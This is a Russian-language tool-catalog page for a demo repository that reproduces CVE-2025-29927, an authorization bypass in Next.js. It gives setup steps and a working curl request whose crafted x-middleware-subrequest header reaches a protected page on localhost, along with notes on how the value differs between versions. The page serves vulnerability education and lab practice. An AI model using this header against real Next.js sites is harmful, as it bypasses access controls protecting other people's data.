Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-29927-demo — Демонстрация уязвимости обхода авторизации CVE-2025-29927 в Next.js. | Kitploit
Инструменты/GitHubGitHub/t3tra-dev/cve-2025-29927-demo
Аутентификация и авторизацияАнализ уязвимостейЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubt3tra-dev/cve-2025-29927-demo

cve-2025-29927-demo

Демонстрация уязвимости обхода авторизации CVE-2025-29927 в Next.js.

Репозиторий
41 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2025-29927-demo

Демо-приложение, воспроизводящее уязвимость обхода авторизации в Next.js.

Подробнее об этой уязвимости см. Сводка по уязвимости Next.js CVE-2025-29927 .

Способ воспроизведения уязвимости

  1. Клонируйте этот репозиторий.
root@kitploit:~
git clone https://github.com/t3tra-dev/cve-2025-29927-demo.git
cd cve-2025-29927-demo
git pull origin main
  1. Запустите сервер.
root@kitploit:~
npm install
npm run dev
  1. Отправьте запрос с заголовком x-middleware-subrequest, используя curl или аналогичные инструменты.
root@kitploit:~
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/protected

Это вызовет обход авторизации и предоставит доступ к странице /protected.

Значение middleware — это имя middleware, распознаваемое Next.js. В данном демо-приложении используется middleware с именем middleware, поэтому указание этого значения вызывает обход авторизации.

[!TIP] В Next.js 15.x параметр MAX_RECURSION_DEPTH установлен в 5, поэтому значение middleware необходимо повторять 5 или более раз, разделяя символом :. В старых версиях (14.x) было достаточно просто указать «middleware». Поскольку в этом демо-приложении используется Next.js 15.2.2, требуется именно такое значение.

Скачать инструмент